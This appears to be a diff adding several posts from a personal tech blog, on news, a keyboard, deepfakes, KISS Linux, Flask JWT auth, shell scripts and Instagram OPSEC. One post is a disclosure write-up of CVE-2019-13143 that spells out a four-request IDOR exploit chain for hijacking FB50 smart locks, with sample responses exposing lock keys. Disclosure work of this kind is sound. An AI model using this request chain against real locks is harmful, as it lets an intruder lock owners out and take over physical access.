+   21 June, 2020
+
+You don't need news
+
+My hot 'n' spicy take on "news" today
+
+   News -- the never ending feed of information pertaining to "current
+   events", politics, trivia, and other equally useless junk. News today
+   is literally just this: "<big name person> did/said <dumb
+   thing>!", "<group> protests against <bad thing>!", and
+   so on. Okay, shit's going on in this world. Another day, another thing
+   to be $FEELING about.
+
+   Now here's a question for you: do you remember what news you consumed
+   yesterday? The day before? Last week? Heck no! Maybe some major
+   headlines, but really, what did you gain from learning that
+   information? Must've been interesting to read at that time. Hence,
+   news, by virtue of its "newness", is given importance -- and get this,
+   it isn't even important enough for you to bother remembering it for a
+   few days.
+
+   News is entertainment. Quick gratification that lasts a day, at max.
+
+actionable news
+
+   So what is useful news, then? I think I'll go out on a limb here, and
+   say "anything that is actionable". By that I mean anything that you can
+   physically affect / information that you can actually put to use.
+   Again, there are probably edge-cases and this isn't a rule that fits
+   all, but it's a decent principle to follow.
+
+   As an example, to readers living outside of the US, news regarding
+   police brutality & the Black Lives Matter movement are unactionable.
+   I'm not saying those problems don't exist or don't matter, but what are
+   you really doing to help the cause? Sending thoughts and prayers?
+   Posting angrily on Instagram? Tweeting about it? Stop, and think for
+   yourself if these things actually make any difference. Your time might
+   be better invested in doing something else.
+
+other problems
+
+   There are other, more concerning problems with modern news -- it is no
+   longer purely objective. The sad state of news / reporting today is
+   it's inherently biased. I mean political bias, of course. All news is
+   either left-leaning or right-leaning, and narratives are developed to
+   fit their political stance. This is essentially propaganda. Today's
+   news is propaganda. If anything, this should be reason enough to avoid
+   it.
+
+but I compare multiple sources!
+
+   Okay, so you read the same thing written by CNN, BBC, The New York
+   Times, etc.? Do you realize how much time you wasted doing this?
+   Ultimately to what end -- to forget about it by the next day, and do it
+   all over again. What a dull, braindead process.
+
+won't I be ignorant then?
+
+   If you think keeping up with current events makes you intellectually
+   superior somehow...boy are you wrong. Do something that actually
+   stimulates your gray matter. But, here's the thing, if the "news" is
+   big enough, you're bound to come across it anyway! You might hear your
+   friend discuss it, or see it on Twitter, so on and so forth. How you
+   process it thereafter is what matters.
+
+   Give it a thought. Imagine if all that social media, news, and general
+   internet noise didn't clog your head. I think it'll be much nicer. You
+   might not, and that's okay. Mail your thoughts or @ me on the fedi --
+   I'd like to hear them.

@@ -0,0 +1,64 @@ 
+   22 August, 2020
+
+The Ducky One 2 SF
+
+I fell for the mechanical keyboard meme
+
+   Thanks to the pandemic yada yada I've been working from home (and
+   attending college from home), and I figured my WFH setup could use an
+   upgrade. Unfortunately, the choices for mechanical keyboards in India
+   are fairly limited. All imports from China don't get through, and
+   imports from elsewhere have a fat duty slapped on it -- sometimes up to
+   300%^[1]1. It's obscene!
+
+   The only reliable source I've found (and folks on [2]r/mkindia will
+   concur), is [3]Meckeys. They aren't particularly abundant in variety,
+   but there's some decent prebuilts that you can pick up on there -- and
+   I copped the Ducky One 2 SF.
+
+   Ducky One 2 SF side view
+
+   It's a 65% board, so unlike standard 60% boards, this comes with arrow
+   keys and the Del, PgUp and PgDn keys. I don't really need the arrow
+   keys, but they do come handy on the occasion -- like scrolling, for
+   example. Since this board lacks the function row, the Esc and the ~
+   keys are merged. I have to hit Shift + Esc for tilde (same action as
+   usual), and Fn + Esc for the backtick. Takes a bit of relearning, but
+   it's manageable.
+
+   Ducky One 2 SF top-down view
+
+   The key switches I went with were the Cherry MX Speed Silvers -- like
+   Reds but actuate a bit faster. As it's my first ever mechanical
+   keyboard, I don't really have anything to compare it against. It feels
+   great, but it was pretty jarring initially because even the slightest
+   touch (with the palm for instance), would cause a key to actuate,
+   leading to typos. Again, just a matter of getting accustomed to it; all
+   smooth sailing after. Why did I pick the Speed Silvers? The other
+   switch options were out of stock.
+
+   That said, I think I really quite like linear switches. They're not too
+   noisy, and they feel just right. I haven't noticed any great
+   improvement in my typing speeds though -- I still maintain an average
+   of 90-100 WPM.
+
+   The One 2 SF is fully RGB, i.e. each key is individually lit. Not that
+   I make big use it. I have it set to plain white, and only light up
+   under the key I'm currently pressing. Yes, this also makes it
+   incredibly easy for people to shoulder-peek your passwords. I certainly
+   won't be using it outside home.
+
+   The keyboard itself cost 9599 INR, which is about 128 USD. Meckeys took
+   exactly 10 days to ship it (3rd Aug - 13th Aug). Overall, it's a lovely
+   keyboard, and I cannot type on my laptop's low-travel chiclet-style
+   keyboard, again. There's just no going back.
+     __________________________________________________________________
+
+    1. [4]Reddit link
+
+References
+
+   1. https://icyphox.sh/home/icy/leet/site/build/blog/ducky-one-2/temp.html#fn:1
+   2. https://reddit.com/r/mkindia
+   3. https://meckeys.com/
+   4. https://www.reddit.com/r/mkindia/comments/hzyoof/i_see_many_spreading_misinformation_about_import/

@@ -0,0 +1,86 @@ 
+   11 May, 2020
+
+The efficacy of deepfakes
+
+Can we really write it off as "not a threat"?
+
+   A few days back, NPR put out an article discussing why deepfakes aren't
+   all that powerful in spreading disinformation. [1]Link to article.
+
+   According to the article:
+
+     "We've already passed the stage at which they would have been most
+     effective," said Keir Giles, a Russia specialist with the Conflict
+     Studies Research Centre in the United Kingdom. "They're the dog that
+     never barked."
+
+   I agree. This might be the case when it comes to Russian influence.
+   There are simpler, more cost-effective ways to conduct [2]active
+   measures, like memes. Besides, America already has the infrastructure
+   in place to combat influence ops, and have been doing so for a while
+   now.
+
+   However, there are certain demographics whose governments may not have
+   the capability to identify and perform damage control when a
+   disinformation campaign hits, let alone deepfakes. An example of this
+   demographic: India.
+
+the Indian landscape
+
+   The disinformation problem in India is way more sophisticated, and
+   harder to combat than in the West. There are a couple of reasons for
+   this:
+     * The infrastructure for fake news already exists: WhatsApp
+     * Fact checking media in 22 different languages is non-trivial
+
+   India has had a long-standing problem with misinformation. The 2019
+   elections, the recent CAA controversy and even more recently -- the
+   coronavirus. In some cases, it has even lead to [3]mob violence.
+
+   All of this shows that the populace is easily influenced, and deepfakes
+   are only going to simplify this. What's worse is explaining to a rural
+   crowd that something like a deepfake can exist -- comprehension and
+   adoption of technology has always been slow in India, and can be
+   attributed to socio-economic factors.
+
+   There also exists a majority of the population that's already been
+   influenced to a certain degree: the right wing. A deepfake of a Muslim
+   leader trashing Hinduism will be eaten up instantly. They are inclined
+   to believe it is true, by virtue of prior influence and given the
+   present circumstances.
+
+countering deepfakes
+
+   The thing about deepfakes is the tech to spot them already exists. In
+   fact, some can even be eyeballed. Deepfake imagery tends to have weird
+   artifacting, which can be noticed upon closer inspection. Deepfake
+   videos, of people specifically, blink / move weirdly. The problem at
+   hand, however, is the general public cannot be expected to notice these
+   at a quick glance, and the task of proving a fake is left to
+   researchers and fact checkers.
+
+   Further, India does not have the infrastructure to combat deepfakes at
+   scale. By the time a research group / think tank catches wind of it,
+   the damage is likely already done. Besides, disseminating contradictory
+   information, i.e. "this video is fake", is also a task of its own.
+   Public opinion has already been swayed, and the brain dislikes
+   contradictions.
+
+why haven't we seen it yet?
+
+   Creating a deepfake isn't trivial. Rather, creating a convincing one
+   isn't. I would also assume that most political propaganda outlets are
+   just large social media operations. They lack the technical prowess and
+   / or the funding to produce a deepfake. This doesn't mean they can't
+   ever.
+
+   It goes without saying, but this post isn't specific to India. I'd say
+   other countries with a similar socio-economic status are in a similar
+   predicament. Don't write off deepfakes as a non-issue just because
+   America did.
+
+References
+
+   1. https://www.npr.org/2020/05/07/851689645/why-fake-video-audio-may-not-be-as-powerful-in-spreading-disinformation-as-feare
+   2. https://en.wikipedia.org/wiki/Active_measures
+   3. https://www.npr.org/2018/07/18/629731693/fake-news-turns-deadly-in-india

@@ -0,0 +1,197 @@ 
+   05 August, 2019
+
+Picking the FB50 smart lock (CVE-2019-13143)
+
+... and lessons learnt in IoT security
+
+   (originally posted at [1]SecureLayer7's Blog, with my edits)
+
+The lock
+
+   The lock in question is the FB50 smart lock, manufactured by Shenzhen
+   Dragon Brother Technology Co. Ltd. This lock is sold under multiple
+   brands across many ecommerce sites, and has over, an estimated, 15k+
+   users.
+
+   The lock pairs to a phone via Bluetooth, and requires the OKLOK app
+   from the Play/App Store to function. The app requires the user to
+   create an account before further functionality is available. It also
+   facilitates configuring the fingerprint, and unlocking from a range via
+   Bluetooth.
+
+   We had two primary attack surfaces we decided to tackle -- Bluetooth
+   (BLE) and the Android app.
+
+Via Bluetooth Low Energy (BLE)
+
+   Android phones have the ability to capture Bluetooth (HCI) traffic
+   which can be enabled under Developer Options under Settings. We made
+   around 4 "unlocks" from the Android phone, as seen in the screenshot.
+
+   wireshark packets
+
+   This is the value sent in the Write request:
+
+   wireshark write req
+
+   We attempted replaying these requests using gattool and gattacker, but
+   that didn't pan out, since the value being written was encrypted.^[2]1
+
+Via the Android app
+
+   Reversing the app using jd-gui, apktool and dex2jar didn't get us too
+   far since most of it was obfuscated. Why bother when there exists an
+   easier approach -- BurpSuite.
+
+   We captured and played around with a bunch of requests and responses,
+   and finally arrived at a working exploit chain.
+
+The exploit
+
+   The entire exploit is a 4 step process consisting of authenticated HTTP
+   requests:
+    1. Using the lock's MAC (obtained via a simple Bluetooth scan in the
+       vicinity), get the barcode and lock ID
+    2. Using the barcode, fetch the user ID
+    3. Using the lock ID and user ID, unbind the user from the lock
+    4. Provide a new name, attacker's user ID and the MAC to bind the
+       attacker to the lock
+
+   This is what it looks like, in essence (personal info redacted).
+
+Request 1
+
+POST /oklock/lock/queryDevice
+{"mac":"XX:XX:XX:XX:XX:XX"}
+
+   Response:
+{
+   "result":{
+      "alarm":0,
+      "barcode":"<BARCODE>",
+      "chipType":"1",
+      "createAt":"2019-05-14 09:32:23.0",
+      "deviceId":"",
+      "electricity":"95",
+      "firmwareVersion":"2.3",
+      "gsmVersion":"",
+      "id":<LOCK ID>,
+      "isLock":0,
+      "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
+      "lockPwd":"000000",
+      "mac":"XX:XX:XX:XX:XX:XX",
+      "name":"lock",
+      "radioName":"BlueFPL",
+      "type":0
+   },
+   "status":"2000"
+}
+
+Request 2
+
+POST /oklock/lock/getDeviceInfo
+
+{"barcode":"https://app.oklok.com.cn/app.html?id=<BARCODE>"}
+
+   Response:
+   "result":{
+      "account":"email@some.website",
+      "alarm":0,
+      "barcode":"<BARCODE>",
+      "chipType":"1",
+      "createAt":"2019-05-14 09:32:23.0",
+      "deviceId":"",
+      "electricity":"95",
+      "firmwareVersion":"2.3",
+      "gsmVersion":"",
+      "id":<LOCK ID>,
+      "isLock":0,
+      "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
+      "lockPwd":"000000",
+      "mac":"XX:XX:XX:XX:XX:XX",
+      "name":"lock",
+      "radioName":"BlueFPL",
+      "type":0,
+      "userId":<USER ID>
+   }
+
+Request 3
+
+POST /oklock/lock/unbind
+
+{"lockId":"<LOCK ID>","userId":<USER ID>}
+
+Request 4
+
+POST /oklock/lock/bind
+
+{"name":"newname","userId":<USER ID>,"mac":"XX:XX:XX:XX:XX:XX"}
+
+That's it! (& the scary stuff)
+
+   You should have the lock transferred to your account. The severity of
+   this issue lies in the fact that the original owner completely loses
+   access to their lock. They can't even "rebind" to get it back, since
+   the current owner (the attacker) needs to authorize that.
+
+   To add to that, roughly 15,000 user accounts' info are exposed via
+   IDOR. Ilja, a cool dude I met on Telegram, noticed locks named
+   "carlock", "garage", "MainDoor", etc.^[3]2 This is terrifying.
+
+   shudders
+
+Proof of Concept
+
+   [4]PoC Video
+
+   [5]Exploit code
+
+Disclosure timeline
+
+     * 26th June, 2019: Issue discovered at SecureLayer7, Pune
+     * 27th June, 2019: Vendor notified about the issue
+     * 2nd July, 2019: CVE-2019-13143 reserved
+     * No response from vendor
+     * 2nd August 2019: Public disclosure
+
+Lessons learnt
+
+   DO NOT. Ever. Buy. A smart lock. You're better off with the "dumb" ones
+   with keys. With the IoT plague spreading, it brings in a large attack
+   surface to things that were otherwise "unhackable" (try hacking a
+   "dumb" toaster).
+
+   The IoT security scene is rife with bugs from over 10 years ago, like
+   executable stack segments^[6]3, hardcoded keys, and poor development
+   practices in general.
+
+   Our existing threat models and scenarios have to be updated to factor
+   in these new exploitation possibilities. This also broadens the playing
+   field for cyber warfare and mass surveillance campaigns.
+
+Researcher info
+
+   This research was done at [7]SecureLayer7, Pune, IN by:
+     * Anirudh Oppiliappan (me)
+     * S. Raghav Pillai ([8]@_vologue)
+     * Shubham Chougule ([9]@shubhamtc)
+     __________________________________________________________________
+
+    1. [10]This article discusses a similar smart lock, but they broke the
+       encryption.
+    2. Thanks to Ilja Shaposhnikov (@drakylar).
+    3. [11]PDF
+
+References
+
+   1. http://blog.securelayer7.net/fb50-smart-lock-vulnerability-disclosure
+   2. https://icyphox.sh/home/icy/leet/site/build/blog/fb50/temp.html#fn:1
+   3. https://icyphox.sh/home/icy/leet/site/build/blog/fb50/temp.html#fn:2
+   4. https://twitter.com/icyphox/status/1158396372778807296
+   5. https://github.com/icyphox/pwnfb50
+   6. https://icyphox.sh/home/icy/leet/site/build/blog/fb50/temp.html#fn:3
+   7. https://securelayer7.net/
+   8. https://twitter.com/_vologue
+   9. https://twitter.com/shubhamtc
+  10. https://www.pentestpartners.com/security-blog/pwning-the-nokelock-api/
+  11. https://gsec.hitb.org/materials/sg2015/whitepapers/Lyon%20Yang%20-%20Advanced%20SOHO%20Router%20Exploitation.pdf

@@ -0,0 +1,1 @@ 
+

@@ -0,0 +1,144 @@ 
+   13 January, 2020
+
+Five days in a TTY
+
+I installed KISS Linux
+
+   This new semester has been pretty easy on me, so far. I hardly every
+   have any classes (again, so far), and I've a ton of free time on my
+   hands. This calls for -- yep---a distro hop!
+
+Why KISS?
+
+   [1]KISS has been making rounds on the interwebz lately.^[2]1 The Hacker
+   News post spurred quite the discussion. But then again, that is to be
+   expected from Valleybros who use macOS all day. :^)
+
+   From the website,
+
+     An independent Linux® distribution with a focus on simplicity and
+     the concept of "less is more". The distribution targets only the
+     x86-64 architecture and the English language.
+
+   Like many people did in the HN thread, "simplicity" here is not to be
+   confused with "ease". It is instead, simplicity in terms of lesser and
+   cleaner code -- no [3]Poetterware.
+
+   This, I can get behind. A clean system with less code is like a clean
+   table. It's nice to work on. It also implies security to a certain
+   extent since there's a smaller attack surface.
+
+   The [4]kiss package manager is written is pure POSIX sh, and does just
+   enough. Packages are compiled from source and kiss automatically
+   performs dependency resolution. Creating packages is ridiculously easy
+   too.
+
+   Speaking of packages, all packages -- both official & community repos
+   -- are run through shellcheck before getting merged. This is awesome; I
+   don't think this is done in any other distro.
+
+   In essence, KISS sucks less.
+
+Installing KISS
+
+   The [5]install guide is very easy to follow. Clear instructions that
+   make it hard to screw up; that didn't stop me from doing so, however.
+
+Day 1
+
+   Although technically not in a TTY, it was still not in the KISS system
+   -- I'll count it. I'd compiled the kernel in the chroot and decided to
+   use efibootmgr instead of GRUB. efibootmgr is a neat tool to modify the
+   Intel Extensible Firmware Interface (EFI). Essentially, you boot the
+   .efi directly as opposed to choosing which boot entry you want to boot,
+   through GRUB. Useful if you have just one OS on the system. Removes one
+   layer of abstraction.
+
+   Adding a new EFI entry is pretty easy. For me, the command was:
+efibootmgr --create
+           --disk /dev/nvme0n1 \
+           --part 1 \
+           --label KISS Linux \
+           --loader /vmlinuz
+           --unicode 'root=/dev/nvme0n1p3 rw'  # kernel parameters
+
+   Mind you, this didn't work the first time, or the second, or the third
+   ... a bunch of trial and error (and asking on #kisslinux) later, it
+   worked.
+
+   Well, it booted, but not into KISS. Took a while to figure out that the
+   culprit was CONFIG_BLK_DEV_NVME not having been set in the kernel
+   config. Rebuild & reboot later, I was in.
+
+Day 2
+
+   Networking! How fun. An ip a and I see that both USB tethering
+   (ethernet) and wireless don't work. Great. Dug around a bit -- missing
+   wireless drivers was the problem. Found my driver, a binary .ucode from
+   Intel (eugh!). The whole day was spent in figuring out why the kernel
+   would never load the firmware. I tried different variations -- loading
+   it as a module (=m), baking it in (=y) but no luck.
+
+Day 3
+
+   I then tried Alpine's kernel config but that was so huge and had a ton
+   of modules and took far too long to build each time, much to my
+   annoyance. Diffing their config and mine was about ~3000 lines! Too
+   much to sift through. On a whim, I decided to scrap my entire KISS
+   install and start afresh.
+
+   For some odd reason, after doing the exact same things I'd done
+   earlier, my wireless worked this time. Ethernet didn't, and still
+   doesn't, but that's ok.
+
+   Building xorg-server was next, which took about an hour, mostly thanks
+   to spotty internet. The build went through fine, though what wasn't was
+   no input after starting X. Adding my user to the input group wasn't
+   enough. The culprit this time was a missing xf86-xorg-input package.
+   Installing that gave me my mouse back, but not the keyboard!
+
+   It was definitely not the kernel this time, because I had a working
+   keyboard in the TTY.
+
+Day 4 & Day 5
+
+   This was probably the most annoying of all, since the fix was trivial.
+   By this point I had exhausted all ideas, so I decided to build my
+   essential packages and setup my system. Building Firefox took nearly 9
+   hours, the other stuff were much faster.
+
+   I was still chatting on IRC during this, trying to zero down on what
+   the problem could be. And then:
+<dylanaraps> For starters I think st fails due to no fonts.
+
+   Holy shit! Fonts. I hadn't installed any fonts. Which is why none of
+   the applications I tried launching via sowm ever launched, and hence, I
+   was lead to believe my keyboard was dead.
+
+Worth it?
+
+   Absolutely. I cannot stress on how much of a learning experience this
+   was. Also a test of my patience and perseverance, but yeah ok. I also
+   think that this distro is my endgame (yeah, right), probably because
+   other distros will be nothing short of disappointing, in one way or
+   another.
+
+   Huge thanks to the folks at #kisslinux on Freenode for helping me
+   throughout. And I mean, they really did. We chatted for hours on end
+   trying to debug my issues.
+
+   I'll now conclude with an obligatory screenshot.
+
+   scrot
+     __________________________________________________________________
+
+    1. [6]https://news.ycombinator.com/item?id=21021396
+
+References
+
+   1. https://getkiss.org/
+   2. https://icyphox.sh/home/icy/leet/site/build/blog/five-days-tty/temp.html#fn:hn
+   3. https://www.urbandictionary.com/define.php?term=poetterware
+   4. https://github.com/kisslinux/kiss
+   5. https://getkiss.org/pages/install
+   6. https://news.ycombinator.com/item?id=21021396

@@ -0,0 +1,108 @@ 
+   24 June, 2020
+
+Flask-JWT-Extended × Flask-Login
+
+Apparently I do webshit now
+
+   For the past few months, I've been working on building a backend for
+   $STARTUP, with a bunch of friends. I'll probably write in detail about
+   it when we launch our beta. The backend is your bog standard REST API,
+   built on Flask -- if you didn't guess from the title already.
+
+   Our existing codebase heavily relies on [1]Flask-Login; it offers some
+   pretty neat interfaces for dealing with users and their states.
+   However, its default mode of operation -- sessions -- don't really fit
+   into a Flask app that's really just an API. It's not optimal. Besides,
+   this is what [2]JWTs were built for.
+
+   I won't bother delving deep into JSON web tokens, but the general flow
+   is like so:
+     * client logs in via say /login
+     * a unique token is sent in the response
+     * each subsequent request authenticated request is sent with the
+       token
+
+   The neat thing about tokens is you can store stuff in them -- "claims",
+   as they're called.
+
+returning an access_token to the client
+
+   The access_token is sent to the client upon login. The idea is simple,
+   perform your usual checks (username / password etc.) and login the user
+   via flask_login.login_user. Generate an access token using
+   flask_jwt_extended.create_access_token, store your user identity in it
+   (and other claims) and return it to the user in your 200 response.
+
+   Here's the excerpt from our codebase.
+access_token = create_access_token(identity=email)
+login_user(user, remember=request.json["remember"])
+return good("Logged in successfully!", access_token=access_token)
+
+   But, for login_user to work, we need to setup a custom user loader to
+   pull out the identity from the request and return the user object.
+
+defining a custom user loader in Flask-Login
+
+   By default, Flask-Login handles user loading via the user_loader
+   decorator, which should return a user object. However, since we want to
+   pull a user object from the incoming request (the token contains it),
+   we'll have to write a custom user loader via the request_loader
+   decorator.
+# Checks the 'Authorization' header by default.
+app.config["JWT_TOKEN_LOCATION"] = ["json"]
+
+# Defaults to 'identity', but the spec prefers 'sub'.
+app.config["JWT_IDENTITY_CLAIM"] = "sub"
+
+@login.request_loader
+def load_person_from_request(request):
+    try:
+        token = request.json["access_token"]
+    except Exception:
+        return None
+    data = decode_token(token)
+    # this can be your 'User' class
+    person = PersonSignup.query.filter_by(email=data["sub"]).first()
+    if person:
+        return person
+    return None
+
+   There's just one mildly annoying thing to deal with, though.
+   Flask-Login insists on setting a session cookie. We will have to
+   disable this behaviour ourselves. And the best part? There's no
+   documentation for this -- well there is, but it's incomplete and points
+   to deprecated functions.
+
+disabling Flask-Login's session cookie
+
+   To do this, we define a custom session interface, like so:
+from flask.sessions import SecureCookieSessionInterface
+from flask import g
+from flask_login import user_loaded_from_request
+
+@user_loaded_from_request.connect
+def user_loaded_from_request(app, user=None):
+    g.login_via_request = True
+
+
+class CustomSessionInterface(SecureCookieSessionInterface):
+    def should_set_cookie(self, *args, **kwargs):
+        return False
+
+    def save_session(self, *args, **kwargs):
+        if g.get("login_via_request"):
+            return
+        return super(CustomSessionInterface, self).save_session(*args, **kwargs)
+
+
+app.session_interface = CustomSessionInterface()
+
+   In essence, this checks the global store g for login_via_request and
+   and doesn't set a cookie in that case. I've submitted a PR upstream for
+   this to be included in the docs ([3]#514).
+
+References
+
+   1. https://flask-login.readthedocs.io/
+   2. https://jwt.io/
+   3. https://github.com/maxcountryman/flask-login/pull/514

@@ -0,0 +1,168 @@ 
+   24 October, 2019
+
+Hacky scripts
+
+The most fun way to learn to code
+
+   As a CS student, I see a lot of people around me doing courses online
+   to learn to code. Don't get me wrong -- it probably works for some.
+   Everyone learns differently. But that's only going to get you so far.
+   Great you know the syntax, you can solve some competitive programming
+   problems, but that's not quite enough, is it? The actual learning comes
+   from applying it in solving actual problems -- not made up ones. (inb4
+   some seething CP bro comes at me)
+
+   Now, what's an actual problem? Some might define it as real world
+   problems that people out there face, and solving it probably requires
+   building a product. This is what you see in hackathons, generally.
+
+   If you ask me, however, I like to define it as problems that you
+   yourself face. This could be anything. Heck, it might not even be a
+   "problem". It could just be an itch that you want to scratch. And this
+   is where hacky scripts come in. Unclear? Let me illustrate with a few
+   examples.
+
+Now playing status in my bar
+
+   If you weren't aware already -- I rice my desktop. A lot. And a part of
+   this cohesive experience I try to create involves a status bar up at
+   the top of my screen, showing the time, date, volume and battery
+   statuses etc.
+
+   So here's the "problem". I wanted to have my currently playing song
+   (Spotify), show up on my bar. How did I approach this? A few ideas
+   popped up in my head:
+     * Send playerctl's STDOUT into my bar
+     * Write a Python script to query Spotify's API
+     * Write a Python/shell script to query Last.fm's API
+
+   The first approach bombed instantly. playerctl didn't recognize my
+   Spotify client and whined about some dbus issues to top it off. I spent
+   a while in that rabbit hole but eventually gave up.
+
+   My next avenue was the Spotify Web API. One look at the [1]docs and I
+   realize that I'll have to make more than one request to fetch the
+   artist and track details. Nope, I need this to work fast.
+
+   Last resort -- Last.fm's API. Spolier alert, this worked. Also,
+   arguably the best choice, since it shows the track status regardless of
+   where the music is being played. Here's the script in its entirety:
+#!/usr/bin/env bash
+# now playing
+# requires the last.fm API key
+
+source ~/.lastfm    # `export API_KEY="<key>"`
+fg="$(xres color15)"
+light="$(xres color8)"
+
+USER="icyphox"
+URL="http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks"
+URL+="&user=$USER&api_key=$API_KEY&format=json&limit=1&nowplaying=true"
+NOTPLAYING=" "    # I like to have it show nothing
+RES=$(curl -s $URL)
+NOWPLAYING=$(jq '.recenttracks.track[0]."@attr".nowplaying' <<< "$RES" | tr -d '
+"')
+
+
+if [[ "$NOWPLAYING" = "true" ]]
+then
+        TRACK=$(jq '.recenttracks.track[0].name' <<< "$RES" | tr -d '"')
+        ARTIST=$(jq '.recenttracks.track[0].artist."#text"' <<< "$RES" | tr -d '
+"')
+        echo -ne "%{F$light}$TRACK %{F$fg}by $ARTIST"
+else
+        echo -ne "$NOTPLAYING"
+fi
+
+   The source command is used to fetch the API key which I store at
+   ~/.lastfm. The fg and light variables can be ignored, they're only for
+   coloring output on my bar. The rest is fairly trivial and just involves
+   JSON parsing with [2]jq. That's it! It's so small, but I learnt a ton.
+   For those curious, here's what it looks like running:
+
+   now playing status polybar
+
+Update latest post on the index page
+
+   This pertains to this very blog that you're reading. I wanted a quick
+   way to update the "latest post" section in the home page and the
+   [3]blog listing, with a link to the latest post. This would require
+   editing the Markdown [4]source of both pages.
+
+   This was a very interesting challenge to me, primarily because it
+   requires in-place editing of the file, not just appending. Sure, I
+   could've come up with some sed one-liner, but that didn't seem very
+   fun. Also I hate regexes. Did a lot of research (read: Googling) on
+   in-place editing of files in Python, sorting lists of files by
+   modification time etc. and this is what I ended up on, ultimately:
+#!/usr/bin/env python3
+
+from markdown2 import markdown_path
+import os
+import fileinput
+import sys
+
+# change our cwd
+os.chdir("bin")
+
+blog = "../pages/blog/"
+
+# get the most recently created file
+def getrecent(path):
+    files = [path + f for f in os.listdir(blog) if f not in ["_index.md", "feed.
+xml"]]
+    files.sort(key=os.path.getmtime, reverse=True)
+    return files[0]
+
+# adding an entry to the markdown table
+def update_index(s):
+    path = "../pages/_index.md"
+    with open(path, "r") as f:
+        md = f.readlines()
+    ruler = md.index("|  --  | --: |\n")
+    md[ruler + 1] = s + "\n"
+
+    with open(path, "w") as f:
+        f.writelines(md)
+
+# editing the md source in-place
+def update_blog(s):
+    path = "../pages/blog/_index.md"
+    s = s + "\n"
+    for l in fileinput.FileInput(path, inplace=1):
+        if "--:" in l:
+            l = l.replace(l, l + s)
+        print(l, end=""),
+
+
+# fetch title and date
+meta = markdown_path(getrecent(blog), extras=["metadata"]).metadata
+fname = os.path.basename(os.path.splitext(getrecent(blog))[0])
+url = "/blog/" + fname
+line = f"| [{meta['title']}]({url}) | `{meta['date']}` |"
+
+update_index(line)
+update_blog(line)
+
+   I'm going to skip explaining this one out, but in essence, it's one
+   massive hack. And in the end, that's my point exactly. It's very hacky,
+   but the sheer amount I learnt by writing this ~50 line script can't be
+   taught anywhere.
+
+   This was partially how [5]vite was born. It was originally intended to
+   be a script to build my site, but grew into a full-blown Python
+   package. I could've just used an off-the-shelf static site generator
+   given that there are [6]so many of them, but I chose to write one
+   myself.
+
+   And that just about sums up what I wanted to say. The best and most fun
+   way to learn to code -- write hacky scripts. You heard it here.
+
+References
+
+   1. https://developer.spotify.com/documentation/web-api/
+   2. https://stedolan.github.io/jq/
+   3. https://icyphox.sh/blog
+   4. https://github.com/icyphox/site/tree/master/pages
+   5. https://github.com/icyphox/vite
+   6. https://staticgen.com/

@@ -0,0 +1,120 @@ 
+   02 December, 2019
+
+Instagram OPSEC
+
+Operational security for the average zoomer
+
+   Which I am not, of course. But seeing as most of my peers are, I am
+   compelled to write this post. Using a social platform like Instagram
+   automatically implies that the user understands (to some level) that
+   their personally identifiable information is exposed publicly, and they
+   sign up for the service understanding this risk -- or I think they do,
+   anyway. But that's about it, they go ham after that. Sharing every
+   nitty gritty detail of their private lives without understanding the
+   potential risks of doing so.
+
+   The fundamentals of OPSEC dictacte that you develop a threat model, and
+   Instgrammers are obviously incapable of doing that -- so I'll do it for
+   them.
+
+Your average Instagrammer's threat model
+
+   I stress on the word "average", as in this doesn't apply to those with
+   more than a couple thousand followers. Those type of accounts
+   inherently face different kinds of threats -- those that come with
+   having a celebrity status, and are not in scope of this analysis.
+     * State actors: This doesn't really fit into our threat model, since
+       our target demographic is simply not important enough. That said,
+       there are select groups of individuals that operate on
+       Instagram^[1]1, and they can potentially be targetted by a state
+       actor.
+
+     * OSINT: This is probably the biggest threat vector, simply because
+       of the amount of visual information shared on the platform. A lot
+       can be gleaned from one simple picture in a nondescript alleyway.
+       We'll get into this in the DOs and DON'Ts in a bit.
+     * Facebook & LE: Instagram is the last place you want to be doing an
+       illegal, because well, it's logged and more importantly -- not
+       end-to-end encrypted. Law enforcement can subpoena any and all
+       account information. Quoting Instagram's [2]page on this:
+
+     a search warrant issued under the procedures described in the
+     Federal Rules of Criminal Procedure or equivalent state warrant
+     procedures upon a showing of probable cause is required to compel
+     the disclosure of the stored contents of any account, which may
+     include messages, photos, comments, and location information.
+
+   That out of the way, here's a list of DOs and DON'Ts to keep in mind
+   while posting on Instagram.
+
+DON'Ts
+
+     * Use Instagram for planning and orchestrating illegal shit! I've
+       explained why this is a terrible idea above. Use secure comms --
+       even WhatsApp is a better choice, if you have nothing else. In
+       fact, try avoiding IG DMs altogether, use alternatives that
+       implement E2EE.
+     * Film live videos outside. Or try not to, if you can. You might
+       unknowingly include information about your location: street signs,
+       shops etc. These can be used to ascertain your current location.
+     * Film live videos in places you visit often. This compromises your
+       security at places you're bound to be at.
+     * Share your flight ticket in your story! I can't stress this
+       enough!!! Summer/winter break? "Look guys, I'm going home! Here's
+       where I live, and here's my flight number -- feel free to track
+       me!". This scenario is especially worrisome because the start and
+       end points are known to the threat actor, and your arrival time can
+       be trivially looked up -- thanks to the flight number on your
+       ticket. So, just don't.
+     * Post screenshots with OS specific details. This might border on
+       pendantic, but better safe than sorry. Your phone's statusbar and
+       navbar are better cropped out of pictures. They reveal the time,
+       notifications (apps that you use), and can be used to identify your
+       phone's operating system. Besides, the status/nav bar isn't very
+       useful to your screenshot anyway.
+     * Share your voice. In general, reduce your footprint on the platform
+       that can be used to identify you elsewhere.
+     * Think you're safe if your account is set to private. It doesn't
+       take much to get someone who follows you, to show show your profile
+       on their device.
+
+DOs
+
+     * Post pictures that pertain to a specific location, once you've
+       moved out of the location. Also applies to stories. It can wait.
+     * Post pictures that have been shot indoors. Or try to; reasons
+       above. Who woulda thunk I'd advocate bathroom selfies?
+     * Delete old posts that are irrelevant to your current audience. Your
+       friends at work don't need to know about where you went to high
+       school.
+
+   More DON'Ts than DOs, that's very telling. Here are a few more points
+   that are good OPSEC practices in general:
+     * Think before you share. Does it conform to the rules mentioned
+       above?
+     * Compartmentalize. Separate as much as you can from what you share
+       online, from what you do IRL. Limit information exposure.
+     * Assess your risks: Do this often. People change, your environments
+       change, and consequentially the risks do too.
+
+Fin
+
+   Instagram is -- much to my dismay---far too popular for it to die any
+   time soon. There are plenty of good reasons to stop using the platform
+   altogether (hint: Facebook), but that's a discussion for another day.
+
+   Or be like me:
+
+   0 posts lul
+
+   And that pretty much wraps it up, with a neat little bow.
